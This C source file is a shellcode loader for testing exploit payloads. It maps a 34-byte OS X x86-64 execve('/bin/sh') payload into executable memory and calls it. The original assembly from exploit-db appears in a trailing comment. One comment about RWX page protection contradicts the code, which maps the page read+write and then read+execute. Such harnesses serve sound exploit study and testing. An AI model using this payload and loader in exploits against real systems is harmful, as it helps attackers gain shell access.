Beauty and the Bin/sh
// * .,.. _ _ _ | |
// ` ,:':::` | | (_) | | | |
// :: ::::=. . | |__ _ _ __ ___| |__ ___ | |
// \.:|| .::::| :: | '_ \| | '_ \ / __| '_ \ / __| | |
// /_.|| .:::::u::: * | |_) | | | | |\__ \ | | || (__ | |
// .- ||______:::: . |_.__/|_|_| |_||___/_| |_(_)___| | |
// '-------::' | |
// \_\= /'::.':' | |
// ///_ - --_ Victor Roemer (wtfbbqhax), <victor@badsec.org>. | |
///._\=---- Wrote sometime between 2014-2015 | |
// | |
// Original shellcode was obtained from exploit-db.com, can be seen in the | |
// comment block following main(). | |
/* Q: Is it the last shellcode boiler-plate you'll ever use again?? */ | |
#include <stdio.h> | |
#include <sys/mman.h> | |
#include <string.h> | |
/* A loaded payload is invoked through this type: no arguments, no result. */
typedef void (*Func_t)(void);
/* Raw payload bytes.  Declared as an (incomplete) array type so that an
 * object of this type keeps its array-ness and sizeof() in NewFunc()
 * yields the payload length rather than a pointer size. */
typedef char const ByteCode[];
/* Page protection used by _NewFunc(): readable, writable AND executable
 * at the same time -- no W^X separation between the copy and the call. */
#define PROT_RWX (PROT_READ|PROT_WRITE|PROT_EXEC)
/* Anonymous private mapping, not backed by any file. */
#define MAP_MINE (MAP_ANON|MAP_PRIVATE)
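Func_t _NewFunc (ByteCode code, size_t size)
{
    /*
     * Copy `size` bytes of `code` into a fresh anonymous mapping and hand
     * it back as a callable function pointer.
     *
     * The page is created read+write (not executable), filled, and only
     * then flipped to read+execute, so at no point is the region writable
     * and executable at once (W^X).  The original mapped it RWX up front.
     *
     * Returns NULL when size is 0 or when mmap()/mprotect() fail; a failed
     * mprotect() releases the mapping instead of leaking it.  On success
     * the mapping is never unmapped by this module, so callers that load
     * many payloads are responsible for munmap() themselves.  The caller
     * MUST check for NULL before calling the result.
     *
     * NOTE: the name (leading '_' followed by an uppercase letter) is in
     * the identifier space the C standard reserves for the implementation;
     * it is kept unchanged because NewFunc() and external callers expand
     * to it.
     */
    if (size == 0) {
        return NULL;
    }

    void *mem = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_MINE, -1, 0);
    if (mem == MAP_FAILED) {
        return NULL;
    }

    memcpy(mem, code, size);

    /* Drop the write permission before anything can jump into the page. */
    if (mprotect(mem, size, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, size);
        return NULL;
    }

    return (Func_t)mem;
}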
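/* Load the byte array `code` into an executable mapping via _NewFunc().
 * `code` must be an actual array object (e.g. a ByteCode initialised with
 * braces), not a pointer: sizeof(code) has to yield the payload length,
 * not the size of a pointer.  Expands to an expression with no trailing
 * ';' so it can also be used inside a condition or initialiser; the
 * original definition ended in a stray semicolon. */
#define NewFunc(code) _NewFunc((code), sizeof(code))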
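int main(int argc, char *argv[])
{
    /*
     * Demo driver: copy the 34-byte payload below into executable memory
     * and jump to it.  The bytes are the OS X x86-64 /bin/sh payload whose
     * assembly is reproduced in the comment block following main(); it
     * ends in an execve syscall, so when it succeeds control never comes
     * back and the `return 0` is not reached.
     *
     * Exit status: 1 if no executable mapping could be obtained (e.g. the
     * platform refuses executable anonymous pages); 0 otherwise.
     */
    (void)argc;
    (void)argv;

    ByteCode shellcode = {
        0x48, 0x31, 0xf6, 0x56, 0x48, 0xbf, 0x2f, 0x2f,
        0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x57, 0x48,
        0x89, 0xe7, 0x48, 0x31, 0xd2, 0x48, 0x31, 0xc0,
        0xb0, 0x02, 0x48, 0xc1, 0xc8, 0x28, 0xb0, 0x3b,
        0x0f, 0x05
    };

    Func_t binsh = NewFunc(shellcode);
    if (binsh == NULL) {
        /* _NewFunc() reports mmap()/mprotect() failure with NULL; the
         * original called through it unconditionally and would crash. */
        fputs("NewFunc: could not create executable mapping\n", stderr);
        return 1;
    }

    binsh();
    return 0;
}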
//////////////////////////////////////////// Original Shellcode ////////////// | |
/* | |
[*] Author: Csaba Fitzl, @theevilbit | |
[*] Tested on OS X 10.10.5 | |
[*] OS X x64 /bin/sh shellcode, NULL byte free, 34 bytes | |
[*] Assembly version | |
[*] binsh-shellcode.asm | |
[*] ./nasm -f macho64 binsh-shellcode.asm | |
[*] ld -macosx_version_min 10.7.0 -o binsh-shellcode binsh-shellcode.o | |
------------------------------------------------------------------------------- | |
BITS 64 | |
global start | |
section .text | |
start: | |
xor rsi,rsi ;zero out RSI | |
push rsi ;push NULL on stack | |
mov rdi, 0x68732f6e69622f2f ;mov //bin/sh string to RDI (reverse) | |
push rdi ;push rdi to the stack | |
mov rdi, rsp ;store RSP (points to the command string) in RDI | |
xor rdx, rdx ;zero out RDX | |
;store syscall number on RAX | |
xor rax,rax ;zero out RAX | |
mov al,2 ;put 2 to AL -> RAX = 0x0000000000000002 | |
ror rax, 0x28 ;rotate the 2 -> RAX = 0x0000000002000000 | |
mov al,0x3b ;move 3b to AL (execve SYSCALL#) -> RAX = 0x000000000200003b | |
syscall ;trigger syscall | |
------------------------------------------------------------------------------- | |
[*] C version | |
[*] Get the hex opcodes from the object file: otool -t binsh-shellcode.o | |
[*] binsh-shellcode.c | |
[*] Compile: gcc binsh-shellcode.c -o sc | |
[*] Run: ./sc | |
*/ | |